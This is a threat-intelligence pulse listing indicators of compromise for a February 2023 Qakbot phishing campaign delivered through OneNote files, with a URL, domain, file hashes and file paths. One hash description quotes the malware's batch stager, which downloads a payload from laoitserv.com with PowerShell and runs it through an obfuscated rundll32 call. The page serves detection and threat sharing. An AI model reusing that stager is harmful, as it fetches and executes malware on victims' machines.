← Back to Pulse Feed
PULSE DETAIL
PULSE NAME
Phishing 20230207-01 Qakbot OneNote
WHITE DoctorZl0 2023-02-07 Modified: 2023-03-09
7
IOCs
LOW VOLUME
Threat actor: MALLARD SPIDER
Qakbot
MITRE ATT&CK & Malware Families
MALWARE FAMILIES
Qakbot
Indicators of Compromise (7)
All URL FileHash-SHA256 domain FileHash-MD5 FilePath
TYPEINDICATORDESCRIPTIONCREATED
URL https://laoitserv.com/Vos/00.gif 2023-02-07
FileHash-SHA256 a8761a7615773f0e3215b6a3335a587802026f9966af6c1fbf14cc746f7c9df9 Malware - MS OneNote file 2023-02-07
domain laoitserv.com 2023-02-07
FileHash-MD5 6b47a1e167e2dfad4edb0d3766c5ae4b 2023-02-07
FileHash-SHA256 7e466c9bedb65b3b2519cb60532b5424285a969a1947ec648c4e5d566176216c ..@echo off....powershell Invoke-WebRequest -URI https://laoitserv.com/Vos/00.gif -OutFile C:\programdata\big.jpg..call ru%1l32 C:\programdata\big.jpg,DllRegisterServer....exit.... 2023-02-07
FilePath C:\ProgramData\in.cmd 2023-02-08
FilePath C:\programdata\big.jpg 2023-02-08